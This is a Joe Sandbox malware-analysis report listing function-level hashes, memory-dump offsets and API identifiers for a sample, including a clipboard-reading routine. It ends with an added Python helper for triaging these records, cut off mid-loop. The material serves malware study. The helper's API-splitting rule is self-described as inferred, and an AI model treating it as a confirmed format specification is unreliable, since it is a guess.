                                                                                                                                                                                                                                                                                          • Instruction ID: 9a8e885c7f9efbaa7ccb81eed218e0b4b069263c46cb091c2d1049474730d0d2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7611C233A051E40EC7178D3D84005B9BFE30E97535B1983DAF4B89B2D2D6238D8A9761
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                                          • Instruction ID: b28cf3c768fcd90dd8a03dd2320e21e507999ec1ebf4a65f37eb71fdd5601da6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E011EC336051D41EC3268D3C8400565BF930AA7636F5953DAF4B49B3D2D52A8E8A8759
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
                                                                                                                                                                                                                                                                                          • Instruction ID: eee7506c66ed3c3c0bdfe6248444f1f74c2cf0a9a261cc4568fc2b2826e0d8e3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7501F2F1700B018BE720EE12C5E0B3BB2EA6FA1714F18443EC90947700DF72E805CAA5
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
                                                                                                                                                                                                                                                                                          • Instruction ID: 57ddd62bfad8b92166875c3be1d47621922731effecd430b939eae1ff2ba19d6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A11E2367543404FD718CF68D9E06BBB3E19B9A301F89543E9482C3390CBB8C9068B46
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                                                                                                                                                                                                                                                          • Instruction ID: 55029b9e38fdfb0df3b4b8151af6569af59bc0d0f5a25f3444c4cc7de86b0466
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E001B1F1B0035257DB209F55B4C1B27B2A86F95718F08443EE80867342DB7DFC44C2AA
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
                                                                                                                                                                                                                                                                                          • Instruction ID: 8825b0ee1c5aa2ff49e9047f8f4162c21f1c9810d4e812afc32bf93845622f9e
• Opcode Fuzzy Hash: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
• Instruction Fuzzy Hash: 34116B756042005BD3129F25CC80E7BB7FAEFE6701F25943EE78057255DB308852A736
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
• Instruction ID: 05ba769efe85f72c2f71f363c25530b9b77f569686cd2fd050e3b885506edb5b
• Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
• Instruction Fuzzy Hash: 6011E3747507804FD3199F24CCD1E66B7A3ABC6318719853DB8429BB92C67CA805CB64
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
• Instruction ID: 16578d3c4a83003f04d137e1d300357a8e4ba0a1c42718879a7f7822fc840aee
• Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
• Instruction Fuzzy Hash: C311A071608341ABD7249F29DD9077FBBE2EBC2254F15AE2CE59653791C630C841CB0A
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
• Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
• Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
• Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
• Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
• Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
• Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
• Instruction ID: 34064763689ac3de6fc2931be55773beff4606bcf56ef1d504eadd77b2d196bf
• Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
• Instruction Fuzzy Hash: 2E01F272A306008FDF21EF20C905BBF33E5FB86306F0550A6D90A97381E370A8498B80
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
• Instruction ID: e8084dc5e7dfcc4d519ce80bab3f29eab8306755998803453d0699d00f7e5f29
• Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
• Instruction Fuzzy Hash: 3EF06DB5E0C3848BC718DF28C45063AFBE5AB9A700F10A93ED48AA3341DB31D545CB4A
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
• Instruction ID: 105713abdaea2eefd27ce6dba229579eaed4e6cae262987884b2b04d67898584
• Opcode Fuzzy Hash: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
• Instruction Fuzzy Hash: BAF069B410D3919FC300DF29D29051BFFE0ABD5318F64EA5CE8DA5B212D334C5028B4A
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
• Instruction ID: 54f6791b19feaab174315a8068ce3548ef6630c58af0954641ad5995dfcb3488
• Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
• Instruction Fuzzy Hash: 1CF0EDB1A88301BAF6258A01CC43F6BB6B89B55B04F301519B344790E0E5E1B5498B1E
Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                                                          • Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                                          • Instruction ID: 3f0327492912c326d74bc6b1bae2584806e2ff85f78facd436f9c1379979bcc7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94F0A735B457808BEB04CF38E82199BBBE6E787228F145A7DD641D3751DB39C4018605
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                                          • Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                                                          • Instruction ID: 80fbaeeab38f874a1026c3ded23ccaa1ef9bb188e1373d2453640531e5596f5f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2D02E2480C63AC20E2A0E1401301BEA72A0A23505B0F59E6DCE1BF282CBE2C80B4358
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                                          • Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                                          • Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
• Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
• Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
• Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
• String ID: ($P$W$]$j$x
• API String ID: 2832541153-1642767450
• Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
• Instruction ID: f53a5e1f8ee9b91d7136638630b9b731faa22d6d69be784595d1073ad77bd381
• Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
• Instruction Fuzzy Hash: 49419F7051C7818ED301AF78999836FBEE09F86314F084A7EE8D986392D6788549C7A3
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID: L
• API String ID: 2610073882-2909332022
• Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
• Instruction ID: 8b67c78340b8fb1ad4e063d2d18872e235bfd1e7b5bd58e0c5bd348bd25d5f3e
• Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
• Instruction Fuzzy Hash: 0D41497110CBC18ED321DB38845865EBFE1ABE6220F188A9DE1F5873E2D675854ACB53
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID: L
• API String ID: 2610073882-2909332022
• Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
• Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
• Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
• Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-3916222277
• Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
• Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
• Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
• Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: FreeLibrary
• String ID: Wu
• API String ID: 3664257935-4083010176
• Opcode ID: 8501977874cf33a4c46fa7807dbe23817083d533ce9f3e4674829aa3b3398596
• Instruction ID: 58510d58c826e4dda8c4a846b9b6f57f468079e8869e8656342225e30f6071e8
• Opcode Fuzzy Hash: 8501977874cf33a4c46fa7807dbe23817083d533ce9f3e4674829aa3b3398596
• Instruction Fuzzy Hash: 03C002B98089009BDF416FB5FE0A8293EA5EB4670670201F4FC0951433DB3A0926EB99
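The per-function records above are the useful part of this section: the clipboard reader in the unpacked region at 0x2480000, and the Variant$ClearInit routine that shows up with the same Opcode ID in both the 0x2480000 dump and the overwritten image at 0x400000 (different Instruction IDs, as expected for the same code at a different base). The following triage helper is an added example, not code from Joe Sandbox or from this report: it parses the "Header / • Key: Value" layout exactly as it appears on this page, splits the API ID into API-name fragments, and lists Opcode IDs that recur across memory dumps. The splitting rule for API ID (fragments separated by "$", with the trailing run concatenated in CamelCase) is inferred from the entries on this page and is an assumption; the sample input is three records copied from the section above.

```python
"""Triage helper for Joe Sandbox per-function "Similarity" records (added example)."""
import re
from collections import defaultdict

# Constructed sample: three records copied from this report. Non-bullet header
# lines ("Joe Sandbox IDA Plugin", "Yara matches", ...) are ignored by the parser.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
• String ID: ($P$W$]$j$x
• API String ID: 2832541153-1642767450
• Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
• Instruction ID: f53a5e1f8ee9b91d7136638630b9b731faa22d6d69be784595d1073ad77bd381
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Similarity
• API ID: Variant$ClearInit
• String ID: L
• API String ID: 2610073882-2909332022
• Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
• Instruction ID: 8b67c78340b8fb1ad4e063d2d18872e235bfd1e7b5bd58e0c5bd348bd25d5f3e
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Variant$ClearInit
• String ID: L
• API String ID: 2610073882-2909332022
• Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
• Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
"""

RECORD_START = "Memory Dump Source"          # first header of every function record
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")
FRAGMENT_RE = re.compile(r"[A-Z][a-z0-9]*")  # one CamelCase word per API-name fragment


def parse_entries(text):
    """Return one dict per function record, keyed by the bullet labels."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == RECORD_START:
            current = {}
            records.append(current)
        elif line.startswith("•") and current is not None:
            key, _, value = line.lstrip("• ").partition(":")
            current[key.strip()] = value.strip()
    return records


def api_fragments(record):
    """Split the API ID into name fragments.

    Assumption (inferred from this page): '$' separates fragments shared by several
    imports; the last chunk concatenates the remaining fragments in CamelCase.
    """
    fragments = set()
    for chunk in record.get("API ID", "").split("$"):
        fragments.update(FRAGMENT_RE.findall(chunk))
    return fragments


def dump_offset(record):
    """Memory-dump base address (hex string) taken from the Source File line."""
    match = OFFSET_RE.search(record.get("Source File", ""))
    return match.group(1).upper() if match else None


def find_by_fragments(records, wanted):
    """Records whose API ID contains any of the wanted fragments, e.g. {'Clipboard'}."""
    wanted = set(wanted)
    return [r for r in records if wanted & api_fragments(r)]


def shared_opcodes(records):
    """Opcode IDs present in more than one dump -> {opcode id: {dump base: instruction id}}.

    The same routine relocated to another base keeps its Opcode ID while its
    Instruction ID changes, which is the pattern the two Variant$ClearInit
    records on this page show.
    """
    seen = defaultdict(dict)
    for r in records:
        if "Opcode ID" in r:
            seen[r["Opcode ID"]][dump_offset(r)] = r.get("Instruction ID")
    return {op: dumps for op, dumps in seen.items() if len(dumps) > 1}


if __name__ == "__main__":
    recs = parse_entries(SAMPLE)
    for r in find_by_fragments(recs, {"Clipboard"}):
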